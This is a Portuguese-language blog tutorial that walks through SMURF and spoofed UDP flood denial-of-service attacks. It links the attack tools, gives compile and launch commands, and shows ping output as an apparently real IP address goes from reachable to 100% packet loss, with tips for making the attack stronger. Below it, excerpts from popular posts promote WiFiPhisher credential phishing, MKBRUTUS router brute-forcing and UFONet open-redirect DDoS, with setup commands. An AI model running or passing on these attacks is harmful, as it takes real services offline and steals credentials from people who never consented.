Pular para o conteúdo principal

Tutorial – Realizando ataque SMURF e UDP Flood

 


Para prosseguirmos precisamos de 3 coisas:
—> broadcast.txt (Uma lista com centenas de Ips) (Pequeno exemplo de lista de  broadcast.txt http://pastebin.com/UeKr5MGJ )



—> udp_flooder.c http://pastebin.com/wGkK495H

|=====================================|
| Primeiros passos |
|=====================================|

Depois de baixar as ferramentas nós temos que compila-las.
Compilando o smurf.c:
# sudo gcc smurf.c -o smurf
#

Compilando o udp_flooder.c:
# sudo gcc udp_flooder.c -o udp_flooder
#

|=====================================|
| Preparando o ataque com Smurf |
|=====================================|

Para continuar daqui pra frente você precisa se tornar root no konsole.

Executando o smurf:
# ./smurf

usage: ./smurf <target> <bcast file> <num packets> <packet delay> <packet size>

target = endereço para atacar
bcast file = arquivo com os endereços de broadcast
num packets = número de pacotes para enviar (0 = flood)
packet delay = espera entre cada pacote (em ms)
packet size = tamanho do pacote (<102)

O comando que irei utilizar para atacar sera este abaixo:
# ./smurf 200.140.161.201 broadcast.txt 0 0 1024

|=====================================|
| Atacando o alvo |
|=====================================|

Antes de atacar o alvo, eu vou dar um “Ping” para ver se ele esta “ON”:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=123 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=102 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=101 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=108 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=102 ms
^C
— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5006ms

Esta “ON”, agora vou executar o comando para atacar:

# ./smurf 200.140.161.201 broadcast.txt 0 0 1024

smurf.c v4.0 by TFreak

Flooding 200.140.161.201 (. = 25 outgoing packets)
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………
……………………………………………………………………………………………………………………

Depois de um certo tempo, vamos pingar o alvo novamente para ver se ele continua “ON”:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=120 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=104 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=114 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=103 ms

— 200.140.161.201 ping statistics —
28 packets transmitted, 5 received, 82% packet loss, time 27086ms

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

— 200.140.161.201 ping statistics —
5 packets transmitted, 0 received, 100% packet loss, time 3999ms

Pronto, o alvo esta “OFF”.

(DICA: quanto maior a lista de “broadcast” mais eficiente sera o seu ataque.

Agora vamos utilizar o udp_flooder.

Para executa-lo:
# ./udp_flooder

[=] + ===========[####]============ + [=]
*** Emperial Flooder[UDP] ***
XxX VIPER CORP GROUP XxX
<-> Underground Max <->
[=] + ==========[####]============ + [=]

Uso: ./udp_flooder <IP_Spoof> <Vitima> <Port_origem> <Port_Destino> <msg> <num_msgs>

O comando que irei utilizar para atacar sera este abaixo:
./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

(Obs: Para que você obtenha bons resultados, este comando precisara ser executado varias vezes consecutivas)

Vamos “pingar” o host alvo:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.
64 bytes from 200.140.161.201: icmp_seq=1 ttl=57 time=111 ms
64 bytes from 200.140.161.201: icmp_seq=2 ttl=57 time=130 ms
64 bytes from 200.140.161.201: icmp_seq=3 ttl=57 time=118 ms
64 bytes from 200.140.161.201: icmp_seq=4 ttl=57 time=126 ms
64 bytes from 200.140.161.201: icmp_seq=5 ttl=57 time=105 ms
64 bytes from 200.140.161.201: icmp_seq=6 ttl=57 time=129 ms

— 200.140.161.201 ping statistics —
6 packets transmitted, 6 received, 0% packet loss, time 5008ms

Agora vamos atacar:
# ./udp_flooder 201.167.3.157 200.140.161.201 80 8090 DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD 1000000

— Estatisticas e infos do ataque ————-

Total de bytes enviados: [31000000]
—————————————-

Depois de executar o comando varias vezes consecutivas, vamos ver o resultado:

# ping 200.140.161.201
PING 200.140.161.201 (200.140.161.201) 56(84) bytes of data.

— 200.140.161.201 ping statistics —
15 packets transmitted, 0 received, 100% packet loss, time 14112ms

Como podem ver o alvo ficou “OFF”.

Comentários

Postagens mais visitadas deste blog

WiFiPhisher - Ataques Automatizados de Phishing Contra Redes Wi-Fi

Um pesquisador de segurança grego, chamado George Chatzisofroniou, desenvolveu uma ferramenta de engenharia social WiFi que é projetado para roubar credenciais de usuários de redes Wi-Fi segura. A ferramenta, batizada WiFiPhisher, foi lançado no site do desenvolvimento de software GitHub no domingo e está disponível gratuitamente para os usuários.   "É um ataque de engenharia social que não usa força bruta, em contraste com outros métodos. É uma maneira fácil de obter senhas WPA", disse George Chatzisofroniou. No entanto, existem várias ferramentas de hacker disponíveis na Internet que pode cortar de uma rede Wi-Fi segura, mas esta ferramenta automatiza múltipla Wi-Fi técnicas que o tornam um pouco diferente dos outros hackers. Ferramenta WiFiPhisher usa ataque "gêmeo do mal " cenário. O mesmo que o gêmeo do mal, a ferramenta cria primeiro um ponto de acesso sem fio falso (AP) mascarar-se como o legítimo Wi-Fi AP. Em seguida, ele dirige uma negação de...

MKBRUTUS – Brute Force para MikroTik e dispositivos com RouterOS

O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. O MKBRUTUS é uma ferramenta desenvolvida em Python 3 que realiza ataques de força bruta em sistemas (baseados em dicionário) contra RouterOS (ver. 3.x ou superior), que têm a porta 8728/TCP aberto. Desenvolvedores: Ramiro Caire  | ramiro.caire@gmail.com | Twitter: @rcaire Federico Massa | fgmassa@vanguardsec.com | Twitter: @fgmassa Projeto:   github.com/mkbrutusproject/mkbrutus 01 Passo Verifique a versão atual do python em seguida realiza a instalação da versão 3 root@kali:~# python –version (Exibe a versão do Python) root@kali:~# apt-get install python3 (Realiza a instalação do Python 3) 02 Passo Execute o comando de verificação da versão do Python novamente e observe que a versão não mudou mas a instalação da ver...

UFONet Open Redirect DDoS Attack

UFONet – is a tool designed to launch DDoS attacks against a target, using ‘Open Redirect’ vectors on third party web applications, like botnet. See this links for more info: https://www.python.org/downloads/ http://pycurl.sourceforge.net/ Installing UFONet UFONet runs on many platforms. It requires Python (2.x.y) and the following library: - python-pycurl - Python bindings to libcurl On Debian-based systems (ex: Ubuntu), run: sudo apt-get install python-pycurl Source libs: Searching for ‘zombies’ UFONet will search on google results for possible ‘Open Redirect’ vulnerable sites. A common query string should be like this: ‘proxy.php?url=’ ‘check.cgi?url=’ ‘checklink?uri=’ ‘validator?uri=’ So for example, you can begin a search with: ./ufonet -s 'proxy.php?url=' At the end of the process, you will be asked if you want to check the list retrieved to see if the urls are vulnerable. Wanna check if they are valid zombies? (Y/n) Also, y...